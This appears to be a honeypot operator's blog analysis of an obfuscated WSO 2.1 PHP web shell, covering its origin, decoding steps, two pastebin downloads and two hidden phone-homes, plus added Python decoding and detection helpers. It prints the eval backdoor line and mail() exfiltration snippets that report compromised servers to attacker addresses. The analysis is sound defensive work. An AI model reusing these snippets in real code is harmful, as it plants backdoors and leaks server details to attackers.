
Web Shell by oRb, Version 2.1, plus a lot of kinks

2018-03-08

Obfuscated WSO version 2.1, an old favorite, this time with somewhat more complicated encoding than is common. The web shell itself is completely kinked: it contains two phone-homes and does two downloads from pastebin.com, one of which is an email tool, the other a WSO 2.6 web shell.

This is complicated. It contains layers of malware.


Origin

IP Address 58.44.44.33

58.44.44.33 has no DNS name.

58.44.44.33 belongs to Hunan Telecom, in Yueyan, Hunan

inetnum:        58.44.0.0 - 58.44.127.255
netname:        CHINANET-HN-YY
country:        CN
descr:          CHINANET-HN Yueyang node network
descr:          hunan Telecom
admin-c:        CHY4-AP
tech-c:         CH636-AP
status:         ALLOCATED NON-PORTABLE
mnt-by:         MAINT-CHINANET-HN
mnt-lower:      MAINT-CHINANET-HN-YY
last-modified:  2008-09-04T07:03:41Z
role:           CHINANET HuNan Yueyang
address:        Dongmaoling telecom building,Yueyang,Hunanan 414000
country:        CN
phone:          +86 730 8235976
fax-no:         +86 730 8235976
e-mail:         abuse.yy@2118.com.cn

The HTTP requests set PHP's HTTP_ACCEPT_LANGUAGE to zh-cn, which makes sense with respect to the IP address' physical location.

p0f3 says 58.44.44.33 runs "Windows 7 or 8":

[2018/03/08 02:07:50] mod=syn|cli=58.44.44.33/9326|srv=162.246.45.144/80|subj=cli|os=Windows 7 or 8|dist=13|params=none|raw_sig=4:115+13:0:1200:8192,2:mss,nop,ws,nop,nop,sok:df,id+:0

The User Agent string of "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" seems to confirm that.

Download

Downloaded to the same 404.php backdoor as this recon malware, except it used more POST parameters. This is a facet of the backdoor just doing a PHP eval() on the value of a specific POST parameter, "@123". The attacker sent a string in "@123" that used POST parameters named "z0", "z1" and "z2".


Decoding

There are multiple threads of decoding, because of the multiply-compromised code. We start with only one file, but end up with many.

  1. Hand edit 58.44.44.33WqEH5ybsZB6qzsq9tL9VmwAAAAE.wso.scans into files z0, z1, z2
  2. Get z0 decoded.
    1. Hand edit z0 to leave only Base64-encoded text
    2. Invoke base64 -d z0 > z0.1
    3. Add "<?php" to z0.1, pretty-print to get z0.2.
  3. Get z1 decoded.
    1. Hand edit z1 to leave only Base64-encoded text
    2. Invoke base64 -d z1 > z1.1
    3. File z1.1 has a string in it: "SCRIPT_FILENAMEZ::/wew.php".
  4. Get z2 decoded.
    1. Hand-edit z0.2, using z1.1 and z2 contents, into dc1.php
    2. Invoke php dc1.php, which decodes the string from z2 into file wew.php
  5. Pretty-print wew.php into wew for readability.
  6. Decode obfuscated phone home (second phone home)
    1. Extract lines 91, 92 from wew into shell_data
    2. Hand-edit shell_data so that it prints instead of evals.
    3. Invoke php shell_data > sd1.php
    4. Hand-edit sd1.php to add "<?php"
    5. Pretty-print sd1.php yielding sd2.php

Further Decoding Notes

Relies on the ancient 404.php backdoor to eval() whatever is in the POST parameter named "@123", which in this case was:

@eval(base64_decode($_POST[z0]));

POST parameter "z0" ends up being a "dropper" that uses value of POST parameter "z1" as a file name, and value of POST parameter "z2" as the contents of that file name.

POST parameter z1 decoded to SCRIPT_FILENAMEZ::/wew.php, which seems wrong for both Linux and Windows machines. A directory named SCRIPT_FILENAMEZ:: would have to exist first, before file_put_contents() would function correctly. I don't think Windows file names can have ':' or '/' characters in them. I suspect this would cause the file_put_contents() call to fail miserably.

The PHP code in POST parameter "z0" uses a second form of encoding for the contents of POST parameter "z1": 2-character hexadecimal representations of the ASCII bytes. The decoding inserts a '%' character before every two characters of the encoded contents, then runs PHP's urldecode() builtin over the resulting "%xx" style hex representations.

File wew.php is the final form of the code, I believe.

Had the attacker actually executed the dropper code (dc1.php), it would have sent back a string like "->|1|<-" to the downloader, if everything worked correctly. It probably wouldn't have.
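An added re-implementation (Python, not the attacker's PHP) of the z1 decoding just described, followed by the check the author reasons through by hand: where file_put_contents() would write and which directory would have to exist first. The hex sample is constructed for this example by encoding the z1 value the notes report.

```python
from urllib.parse import unquote
import posixpath

# Assumed re-implementation (not the attacker's PHP) of the z1 decoding described above:
# the dropper inserts '%' before every two hex characters and runs urldecode() on the result.

def decode_hex_param(encoded: str) -> str:
    """Decode a z1-style value: two hex characters per byte, via '%xx' url-decoding."""
    if len(encoded) % 2 or not all(c in "0123456789abcdefABCDEF" for c in encoded):
        raise ValueError("z1 is not an even-length hex string")
    percent_form = "".join("%" + encoded[i:i + 2] for i in range(0, len(encoded), 2))
    # latin-1 keeps every byte value 1:1, the way PHP's urldecode() would
    return unquote(percent_form, encoding="latin-1")


def dropper_target(z1_hex: str) -> dict:
    """Report where file_put_contents() would write, and which directory must already exist."""
    path = decode_hex_param(z1_hex)
    return {
        "path": path,
        # on Linux this directory has to exist before file_put_contents() can succeed
        "parent_dir": posixpath.dirname(path),
        "basename": posixpath.basename(path),
        # characters Windows rejects inside a file or directory name
        "windows_invalid_chars": sorted(set(path) & set(':*?"<>|')),
    }


# Constructed sample: the hex encoding of the z1 value the notes report, built by hand.
Z1_SAMPLE = "5343524950545f46494c454e414d455a3a3a2f7765772e706870"

if __name__ == "__main__":
    print(dropper_target(Z1_SAMPLE))
```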


Analysis

I'm sorry this is complicated.

wew.php really is WSO 2.1, plus a phone home to wildt00lz@gmail.com, plus download of two files from pastebin.com, wmw.php and 2ww.php, plus a second phone home to d0z_a@yahoo.com. Holy cow, wew.php is totally kinked.

The phone-homes get executed every time wew.php runs, as do a few lines of code that modify php.ini settings to turn Safe Mode off and to eliminate any disabled functions.

Additionally, wew.php sets a cookie that never gets referenced elsewhere:

@setcookie("wsog","orb",time()+3600*24*7);

Perhaps there's some other malware, when installed on the same web site as wew.php that uses this cookie.

Overall, wew.php exhibits WSO's characteristic organization into "action" functions, with dispatch to an action done with PHP's call_user_func() based on the value of a POST parameter named "a".

First phone home

This phone home was just blatantly shoved in to the WSO 2.1 code. No de-obfuscating necessary.

$body = "Shell: http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . " " . "Directory" . dirname(__FILE__);
mail('wildt00lz@gmail.com', $_SERVER['SERVER_ADDR'], $body);
$body = "Shell: http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . " " . "Directory" . dirname(__FILE__);
mail('wildt00lz@hotmail.com', $_SERVER['SERVER_ADDR'], $body);

The email sent to wildt00lz@hotmail.com and wildt00lz@gmail.com would have an IP address of the compromised web server as its "Subject:" line, and the body would have a URL for the original back door, and the directory in which the kinked WSO 2.1 file wew.php ended up, something like:

Shell: http://www.stratigery.com/wp-content/themes/twentytwelve/404.php /var/www/html/wp-content/themes/twentytwelve

This would probably let the attacker guess at a URL for access to wew.php.

wmw.php appears to be a stock LeafMailer; it has comments but not the phone-home found in an earlier LeafMailer.

The source code in 2ww.php needs some cleanup to enhance readability.

De-obfuscating 2ww.php

  1. Run de-obfuscator over 2ww.php yielding 2ww.f1.php
  2. Hand edit 2ww.f1.php - remove the eval(' and ');, un-escape the remaining single-quotes.
  3. Run de-obfuscator over 2ww.f1.php to get 2ww.f2.php

I've seen some obfuscation like this before. The file 2ww.php contains obfuscated PHP, followed by a string of encoded text. Using fopen() on itself via the __FILE__ feature of PHP, the obfuscated PHP reads some of the string of encoded text, decodes it, and evals it.

Deobfuscating the mix of code and encoded code in 2ww.f2.php is iterative: figure out how far along the file pointer from fopen() is in 2ww.php (initially, the fread() sets it to 0x50D = 1293), determine how much of the encoded data to put into the decoding function (first chunk, 0x1A8 = 424 bytes), and how far that fread() advances the file pointer.

x3.php is the final decoder. It was easier to massage a copy of 2ww.f2.php (x3.php) by writing throwaway intermediate PHP programs from pieces of 2ww.php, then incorporating the knowledge gained into x3.php.

Deobfuscated form of 2ww.php is wso2.6.php.

Ironically, most WSO 2.6 files out in the wild have the same phone-home as the "second phone home" in the WSO 2.1 wew.php file. 2ww.php has had it removed.

Second phone home

The second phone home, from Decoding Step 6 above, ends up looking like this:

<?php
$visitcount = $HTTP_COOKIE_VARS["visits"];
if ($visitcount == "") {
    $visitcount = 0;
    $visitor = $_SERVER["REMOTE_ADDR"];
    $web = $_SERVER["HTTP_HOST"];
    $inj = $_SERVER["REQUEST_URI"];
    $target = rawurldecode($web . $inj);
    $body = "Boss, there was an injected target on {$target} by {$visitor}";
    @mail("d0z_a@yahoo.com", "Fx29Shell http://{$target} by {$visitor}", "{$body}");
} else {
    $visitcount;
}
setcookie("visits", $visitcount);

The first time a browser (the code uses HTTP cookies) accesses the kinked WSO wew.php, the compromised server (the host running my WordPress honey pot) sends an email to "d0z_a@yahoo.com" with the URL of wew.php and the IP address of the browser. What a gold mine of info. Oddly, the email will claim that WSO 2.1 is a Fx29Shell web shell. I think this phone home code originates in Fx29Shell. Either the original author of Fx29 put it in, or someone put it in a widely copied version of Fx29. I've seen this phone home in other versions of WSO. See my malware-phylogeny project for some additional detail.
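An added detection helper (not part of the page's decoded files) that flags the three kinks this analysis found in wew.php: hard-coded mail() recipients for both phone-homes, the orphan "wsog" cookie, and the WSO-style call_user_func() dispatch on POST parameter "a". The sample it scans is constructed from the lines quoted above plus a dispatch line written for this example.

```python
import re

# Indicators taken from the wew.php analysis: a literal recipient as mail()'s first argument,
# the orphan "wsog" cookie, and an "action" function dispatched from $_POST['a'].
PHONE_HOME_RE = re.compile(r"""@?\bmail\s*\(\s*['"]([^'"\s]+@[^'"\s]+)['"]""")
COOKIE_RE = re.compile(r"""@?\bsetcookie\s*\(\s*['"]wsog['"]""")
DISPATCH_RE = re.compile(r"""call_user_func\s*\(.*\$_POST\[\s*['"]?a['"]?\s*\]""")


def scan_php(source: str) -> list:
    """Return (line_no, indicator, detail) tuples for every indicator found in the PHP source."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        for m in PHONE_HOME_RE.finditer(line):
            findings.append((no, "phone_home", m.group(1)))
        if COOKIE_RE.search(line):
            findings.append((no, "wsog_cookie", line.strip()))
        if DISPATCH_RE.search(line):
            findings.append((no, "action_dispatch", line.strip()))
    return findings


def phone_home_addresses(source: str) -> list:
    """Distinct hard-coded mail() recipients, the first thing worth pulling out of a new sample."""
    return sorted({detail for _, kind, detail in scan_php(source) if kind == "phone_home"})


# Constructed sample: the lines quoted in the analysis above, plus a dispatch line written
# for this example in the WSO style the text describes (not copied from wew.php).
SAMPLE_PHP = r'''<?php
@setcookie("wsog","orb",time()+3600*24*7);
$body = "Shell: http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . " " . "Directory" . dirname(__FILE__);
mail('wildt00lz@gmail.com', $_SERVER['SERVER_ADDR'], $body);
@mail("d0z_a@yahoo.com", "Fx29Shell http://{$target} by {$visitor}", "{$body}");
if (isset($_POST['a'])) call_user_func('action' . $_POST['a']);
'''

if __name__ == "__main__":
    for finding in scan_php(SAMPLE_PHP):
        print(finding)
```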

Nothing turned up when I googled for "wildt00lz@gmail.com", or "d0z_a@yahoo.com". The addresses seem to have stayed off radar.